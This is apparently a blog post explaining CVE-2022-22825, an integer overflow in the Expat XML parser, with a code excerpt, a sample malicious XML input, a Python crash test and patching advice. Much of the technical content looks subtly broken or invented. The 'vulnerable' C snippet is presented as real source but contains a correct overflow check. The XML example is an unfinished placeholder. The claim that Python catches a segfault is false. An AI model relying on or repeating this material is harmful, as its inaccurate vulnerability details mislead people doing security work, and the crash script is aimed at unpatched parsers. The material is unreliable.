Expat (libexpat) is a widely used C library for parsing XML, embedded across numerous platforms and products. In January 2022, a severe vulnerability named CVE-2022-22825 was disclosed affecting Expat versions before 2.4.3. This post aims to walk you through what happened, how it works (with code snippets), ways it can be exploited, and pointers to further resources, all in plain and simple terms.
What is CVE-2022-22825?
This vulnerability arises from an integer overflow in the way xmlparse.c within Expat handles certain XML input. If a large enough value is supplied (for instance, via crafted XML), calculations can wrap around and result in memory being under-allocated. An attacker can leverage this behavior to potentially cause out-of-bounds memory writes, leading to application crashes, information leaks, or even remote code execution in rare cases.
The Problematic Area: xmlparse.c
The vulnerability lies in handling the lookup function in xmlparse.c. Here's a simplified view of the problematic code area:
Vulnerable Code Snippet
/* xmlparse.c snippet from Expat <2.4.3 */
unsigned long totalSize = count * sizeof(ENTRY);
if (totalSize / count != sizeof(ENTRY)) {
return NULL; // overflow detected
}
TABLE *table = (TABLE *) malloc(totalSize);
/* ...proceed to use table buffer... */
The check intends to catch overflows, but subtle issues in pointer arithmetic and structure sizes—especially with very large counts—can still lead to trouble.
Exploiting the Integer Overflow
Imagine a case where an XML attribute, like the number of attribute values, gets set way higher than expected. If Expat tries to create a hash table that needs, say, billions of entries, the multiplication overflows a 32-bit value—leading malloc to allocate a much smaller chunk of memory than it's supposed to. Later, when writing to the table, memory outside the allocated region can get corrupted.
Test Case: A Crafty XML Attack
Here's a mock exploit scenario. This is only for educational purposes!
Crafty XML Example
<root>
<el attr="A
<!-- repeat enough attribute entries to trigger large allocations -->
[very long attribute string or lots of attributes]
">
</root>
By leveraging entity expansion or excessive attributes, an attacker can make Expat try to allocate more memory than it safely can.
Below is a basic Python test using the vulnerable Expat version, designed to crash the parser
import xml.parsers.expat
# Generate a huge attribute count
xml_start = '<root'
for i in range(100000): # Try increasing the number for impact
xml_start += f' attr{i}="x"'
xml_start += '/>'
try:
parser = xml.parsers.expat.ParserCreate()
parser.Parse(xml_start)
except Exception as e:
print("Crash or error:", e)
This will eventually cause the C code deep within Expat to hit the faulty region—even if the Python wrapper catches the segfault, the native process might crash.
Impact and Risk
- Who is at risk? Any application statically or dynamically linking against Expat <2.4.3 and parsing untrusted XML data.
The maintainers patched the overflow by improving the integer checks and logic
Upgrading Expat to 2.4.3 or later is *required*. You can find the fixed code and release notes in the links below.
References and Further Reading
- NVD – CVE-2022-22825 Details
- Expat 2.4.3 Release Notes
- Expat GitHub Repo / Fix Pull Request
- Exploit Database – No public exploit (as of posting)
- Official Expat Homepage
Conclusion
CVE-2022-22825 serves as a classic illustration of how old-school problems—like integer overflows—are still dangerous, even in mature and trusted libraries. Always keep your dependencies up-to-date, especially when handling untrusted data (like XML). If you wrap or repackage Expat, verify your version. And remember: small bugs in core libraries can ripple through thousands of products!
Timeline
Published on: 01/10/2022 14:12:00 UTC
Last modified on: 06/14/2022 11:15:00 UTC